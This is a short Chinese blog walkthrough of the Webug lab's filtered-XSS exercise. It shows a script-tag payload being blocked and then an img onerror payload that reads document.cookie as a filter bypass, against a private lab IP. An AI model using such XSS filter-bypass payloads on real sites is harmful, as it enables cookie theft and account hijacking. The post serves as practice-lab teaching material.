首页 > 其他分享 >Webug——过滤xss

Webug——过滤xss

时间:2023-03-30 16:23:05浏览次数:42  
标签:control xss 192.168 75.146 过滤 Webug id

同反射型xss相同 在url 参数id中进行xss攻击

http://192.168.75.146/control/xss/filter_xss.php?id=<script>alert(xss)</script>

不过根据反馈 script被过滤了

我们就需要绕过 过滤函数

换一个标签

payload=http://192.168.75.146/control/xss/filter_xss.php?id=<img src=1 one rror=alert(document.cookie)>

标签:control,xss,192.168,75.146,过滤,Webug,id
From: https://www.cnblogs.com/SmallVoter/p/17273258.html

相关文章

  • java 集合过滤出符合条件的List元素集合(lambda表达式)
    应用场景在项目开发的过程中,我们经常会对List集合进行按条件的过滤,筛选出我们想要的结果或者是符合项目需求的数据。比如:我们有一批学生对象,每个学生都有自己的性别属性,但......
  • 设计思路-铭感词过滤
    需求用户输入,如果是系统中管理员录入的铭感词则替换为***或者提示用户铭感词 方案一将管理员录入的词库全部导入到分词词库,设置分词只分含有词库的词语比如敏感词......
  • sql 过滤重复字段,取最早或最新记录
    --可以将重复字段,取最早的一次,同理,也可以取时间最新的一次--方法一withtmpas(selectrow_number()over(partitionby分组字段orderby时间字段)i,......
  • 项目中如何对XSS统一处理
    XSS攻击是什么?XSS攻击是指攻击者利用网站中的漏洞,向页面中注入恶意脚本,从而获取用户的信息或者控制用户的计算机。举一个通俗的例子,早期使用JSP页面渲染页面的项目,如果将......
  • redis-布隆过滤器(RBloomFilter)BloomFilter
    redisredisson布隆过滤器(RBloomFilter)导包<dependency><groupId>org.redisson</groupId><artifactId>redisson-spring-boot-starter</artifactId><versi......
  • 搜索面板和过滤数据(SearchPanel)
    搜索面板和过滤数据(SearchPanel)行政2023年3月2日约3分钟DBGridEh可以显示一个特殊的面板来搜索和过滤网格中的数据。在搜索模式下,网格在所有网格单元格中以......
  • Winform/Csharp中筛选/过滤/判断点是否在面(区域)内-通过Where和Region
    场景在Redis中存储一些坐标数据,需要遍历这些坐标数据筛选出在某个区域范围内的坐标数据。System.Drawing.Region类https://learn.microsoft.com/zh-cn/dotnet/api/syste......
  • 协同过滤
    数据准备importnumpyasnpimportpandasaspdfromsklearnimportmodel_selectionascvfromsklearn.metrics.pairwiseimportpairwise_distancesfromsklearn.......
  • xss跨站脚本
    跨站脚本(英语:Cross-sitescripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响......
  • 过滤器与拦截器
    1.过滤器跟拦截器的区别在说拦截器之前,不得不说一下过滤器,有时候往往被这两个词搞的头大。其实我们最先接触的就是过滤器,还记得web.xml中配置的<filter>吗~你应该知道sp......